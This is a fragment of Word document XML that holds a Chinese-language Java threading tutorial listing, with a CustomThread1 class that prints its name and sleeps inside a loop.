          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法所在的类。</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 </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代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="415" name="图片 3" descr="http://www.blogjava.net/Images/OutliningIndicators/Non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blogjava.net/Images/OutliningIndicators/None.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId135"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> wxhx.csdn2;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 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="416" name="Codehighlighter1_23_60_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_23_60_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="417" name="图片 5"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blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="418" name="图片 6"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blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>@author</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> bzwm  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="419" name="图片 7"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blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> *  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="420" name="图片 8" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>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 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="421" name="Codehighlighter1_99_714_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_99_714_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Thread {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 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="422" name="Codehighlighter1_131_184_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_131_184_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread1() {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 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="423" name="图片 11"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>("[CustomThread1] Thread");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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="424" name="图片 12" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="425" name="Codehighlighter1_212_709_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_212_709_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> run() {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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="426" name="图片 14"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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String threadName = Thread.currentThread().getName();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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="427" name="图片 15"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " start.");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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="428" name="Codehighlighter1_349_589_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_349_589_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> {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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="429" name="Codehighlighter1_394_519_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_394_519_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = 0; i &lt; 5; i++) {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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="430" name="图片 18"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " loop at " + i);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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="431" name="图片 19"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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Thread.sleep(1000);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18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="432" name="图片 20" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
